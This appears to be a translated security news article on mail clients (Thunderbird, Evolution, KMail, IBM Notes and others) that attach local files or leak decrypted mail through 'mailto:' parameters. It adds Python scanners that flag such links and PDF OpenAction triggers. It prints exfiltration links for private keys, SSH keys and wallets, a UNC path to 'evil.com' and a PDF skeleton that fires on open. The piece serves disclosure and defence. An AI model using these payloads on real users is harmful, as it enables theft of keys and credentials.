Attacking email client users via "mailto:" links

Researchers from Ruhr University Bochum (Germany) analysed (PDF) how mail clients behave when handling "mailto:" links carrying extended parameters. Five of the twenty email clients examined were vulnerable to an attack that substitutes resources through the "attach" parameter. Six other email clients were vulnerable to PGP and S/MIME key substitution attacks, and three clients were vulnerable to an attack that extracts the contents of an encrypted message.

"mailto:" links are used to open the email client automatically so that a message can be composed to the recipient named in the link. Besides the address, other parameters can be passed as part of the link, such as the subject and a template for the message body. The proposed attack uses the "attach" parameter, which lets an attachment be added to the generated message.

The mail clients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) and Pegasus Mail were vulnerable to a trivial attack that allows any local file to be attached automatically, specified through a link of the form "mailto:?attach=path_to_file". The file is attached without any warning, so unless the user pays close attention they may not notice that the message will be sent with an attachment.

For example, a link such as "mailto:[email protected]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" inserts the GnuPG private keyring into the message. In the same way the contents of cryptocurrency wallets (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa) and any other file readable by the user can be sent out. Moreover, Thunderbird allows groups of files to be attached by wildcard, using constructs such as "attach=/tmp/*.txt".

Beyond local files, some email clients also process links to network shares and paths on IMAP servers. In particular, IBM Notes allows a file to be pulled from a network directory when handling links such as "attach=\\evil.com\dummyfile", and also allows NTLM authentication parameters to be captured by pointing the link at an SMB server controlled by the attacker (the request is sent with the current user's credentials).

Thunderbird successfully processes requests such as "attach=imap:///fetch>UID>/INBOX>1/", which allows content from folders on the IMAP server to be attached. At the same time, messages fetched from IMAP that are encrypted with OpenPGP or S/MIME are decrypted automatically by the mail client before sending. Thunderbird's developers were notified of the problem in February, and it has already been fixed in Thunderbird 78 (the Thunderbird 52, 60 and 68 branches remain vulnerable).
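The following is an added example written for this article; it is not code from the Bochum paper or from any of the mail clients named above. It shows what a hardened client (or a URL-handler shim placed in front of one) should do with a "mailto:" link before opening a compose window: parse the address part and the "?"-separated header fields as RFC 6068 defines them, honour only a whitelist of fields, and report any "attach"/"attachment" field together with the class of resource it points at (local path, wildcard, UNC path, or a URI scheme such as imap://). The function names, the SAFE_FIELDS whitelist and the sample links are assumptions made here; the sample links are constructed from the article's own examples.

```python
"""Inspect a "mailto:" link before handing it to a compose window.

Added example for this article, not code from the Bochum paper or from any
of the mail clients it names. Parsing follows RFC 6068 (address part, then
"?"-separated header fields); "attach"/"attachment" are the non-standard
fields the attack relies on, and the value classes (local path, wildcard,
UNC path, URI scheme) are the ones the article describes. The sample links
at the bottom are constructed from the article's examples."""
import re
from urllib.parse import parse_qsl, unquote

# Header fields a client can safely honour from an untrusted link (assumed whitelist).
SAFE_FIELDS = {"to", "cc", "bcc", "subject", "body", "in-reply-to"}
ATTACH_FIELDS = {"attach", "attachment"}


def parse_mailto(link: str):
    """Return (recipients, [(field, value), ...]) for a mailto: link.
    Field names are case-insensitive per RFC 6068, so they are lowercased;
    values are percent-decoded by parse_qsl."""
    if not link.lower().startswith("mailto:"):
        raise ValueError("not a mailto: link")
    addr_part, _, query = link[len("mailto:"):].partition("?")
    recipients = [unquote(a) for a in addr_part.split(",") if a]
    fields = [(k.lower(), v) for k, v in parse_qsl(query, keep_blank_values=True)]
    return recipients, fields


def classify_attach(value: str) -> str:
    """Name the kind of resource an attach= value points at."""
    v = value.strip()
    if re.match(r"^[a-z]:[\\/]", v, re.I):          # Windows drive path, not a scheme
        return "local-path"
    if re.match(r"^[a-z][a-z0-9+.-]*:", v, re.I):   # imap://, smb://, file:// ...
        return "uri"
    if v.startswith("\\\\") or v.startswith("//"):  # \\host\share UNC path
        return "unc"
    if any(ch in v for ch in "*?["):                # shell wildcard, e.g. /tmp/*.txt
        return "glob"
    return "local-path"


def inspect_mailto(link: str) -> dict:
    """Sanitise a link: keep only SAFE_FIELDS, and report attach= values and
    HTML markup in subject/body (the meta-refresh trick) as reasons to block."""
    recipients, fields = parse_mailto(link)
    headers, blocked, dropped = {}, [], []
    for field, value in fields:
        if field in ATTACH_FIELDS:
            blocked.append(f"attach ({classify_attach(value)}): {value}")
        elif field in SAFE_FIELDS:
            headers.setdefault(field, value)        # first occurrence wins
        else:
            dropped.append(field)
    for field in ("subject", "body"):
        if field in headers and re.search(r"<\s*meta\b", headers[field], re.I):
            blocked.append(f"html markup in {field}")
    return {"to": recipients, "headers": headers, "blocked": blocked,
            "dropped": dropped, "allow": not blocked}


if __name__ == "__main__":
    # Constructed from the article's examples plus one benign link.
    for link in (
        "mailto:?subject=Title&body=Text&attach=~/.gnupg/secring.gpg",
        "mailto:?attach=/tmp/*.txt",
        r"mailto:?attach=\\evil.com\dummyfile",
        "mailto:?attach=imap:///fetch>UID>/INBOX>1/",
        "mailto:alice@example.org?subject=Hello&body=Hi%20there",
    ):
        r = inspect_mailto(link)
        print("ALLOW" if r["allow"] else "BLOCK", link, r["blocked"])
```

The whitelist approach matters more than the classifier: a client that honours only the RFC 6068 fields never sees "attach" at all, and the classifier exists only so that a blocked link can be logged with the right severity (a UNC path or imap:// URI implies a network request made with the user's credentials, not just a local read).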

Older versions of Thunderbird were also vulnerable to two other attack variants against PGP and S/MIME proposed by the researchers. In particular, Thunderbird, along with Outlook, Postbox, eM Client, MailMate and R2Mail2, was subject to a key substitution attack, caused by the mail client automatically importing and installing new certificates delivered in S/MIME messages, which lets an attacker replace public keys the user has already stored.

The second attack, to which Thunderbird, Postbox and MailMate are susceptible, manipulates the draft-saving mechanism and allows mailto parameters to trigger the decryption of encrypted messages or the addition of a digital signature to an arbitrary message, after which the result is transferred to an IMAP server controlled by the attacker. In this attack the ciphertext is passed through the "body" parameter, and a "meta refresh" tag is used to initiate the connection to the attacker's IMAP server. For example: ' '

To process "mailto:" links automatically without any user interaction, specially crafted PDF documents can be used: the OpenAction entry in a PDF causes the mailto handler to be launched as soon as the document is opened:

%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction 2 0 R >>
endobj

2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=-----BEGIN PGP MESSAGE-----[...]) >>
endobj

trailer
<< /Root 1 0 R >>
%%EOF

(Object headers carry a generation number, "1 0 obj", and the catalog's /OpenAction references the action dictionary directly rather than wrapping it in a destination array. The page tree and xref table are omitted here; readers that rebuild the xref on load still evaluate the OpenAction.)
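The following is an added triage scanner written for this article; it is not code from the paper or from any PDF reader. It finds the /OpenAction entry, follows its object reference (or reads an inline action dictionary), extracts the /URI of a /S /URI action, and reports any mailto: URI launched on open together with the parameters the article shows being abused (attach= for file exfiltration, body= for the draft/decryption attack). The regexes, function names and SAMPLE_PDF are assumptions made here; SAMPLE_PDF is constructed from the document above with an attach= parameter added. Because it uses byte-level regexes rather than a PDF library, it only sees plain-text objects; documents that hide the action in a compressed object stream or a hex-encoded string need a real parser (pypdf, pdfminer) first.

```python
"""Triage scanner for PDFs whose /OpenAction launches a mailto: URI.

Added example for this article, not code from the paper or from any PDF
reader. It works on the plain-text object syntax shown above (byte regexes,
no PDF library), which is enough for a hand-built document like the one in
the article; objects inside compressed object streams or hex-encoded URI
strings would need a real parser first. SAMPLE_PDF is constructed here."""
import re

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\s*(.*?)\s*endobj", re.S)
# Both "/OpenAction 2 0 R" and the (incorrect but seen) array form "/OpenAction [2 0 R]".
OPENACTION_REF_RE = re.compile(rb"/OpenAction\s*\[?\s*(\d+)\s+(\d+)\s+R")
OPENACTION_INLINE_RE = re.compile(rb"/OpenAction\s*<<(.*?)>>", re.S)
# A URI action: /S /URI ... /URI (literal string); a "\)" inside the string is escaped.
URI_ACTION_RE = re.compile(rb"/S\s*/URI\b.*?/URI\s*\((.*?)(?<!\\)\)", re.S)

# Constructed sample: the article's document plus an attach= parameter.
SAMPLE_PDF = b"""%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction 2 0 R >>
endobj
2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=-----BEGIN PGP MESSAGE-----[...]&attach=~/.gnupg/secring.gpg) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""


def pdf_objects(data: bytes) -> dict:
    """Map object number -> object body for every 'N G obj ... endobj'."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(data)}


def open_action_uris(data: bytes) -> list:
    """URIs that fire on open: follow the /OpenAction reference into its
    object, or read an inline /OpenAction dictionary."""
    objs = pdf_objects(data)
    uris = []
    for m in OPENACTION_REF_RE.finditer(data):
        body = objs.get(int(m.group(1)), b"")
        uris += [u.decode("latin-1") for u in URI_ACTION_RE.findall(body)]
    for m in OPENACTION_INLINE_RE.finditer(data):
        uris += [u.decode("latin-1") for u in URI_ACTION_RE.findall(m.group(1))]
    return uris


def mailto_findings(data: bytes) -> list:
    """(uri, [risky parameters]) for every mailto: fired on open.
    attach= is the file-exfiltration parameter; body= is flagged because
    the draft/decryption attack carries the ciphertext there."""
    findings = []
    for uri in open_action_uris(data):
        if uri.lower().startswith("mailto:"):
            risky = [p for p in ("attach=", "attachment=", "body=")
                     if p in uri.lower()]
            findings.append((uri, risky))
    return findings


if __name__ == "__main__":
    for uri, risky in mailto_findings(SAMPLE_PDF):
        print("mailto launched on open:", uri, "risky parameters:", risky)
```

A mailto: URI in an OpenAction is suspicious on its own, since there is no benign reason for a document to start composing mail the moment it is opened; the parameter check only decides how loudly to alert.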


Source: opennet.ru
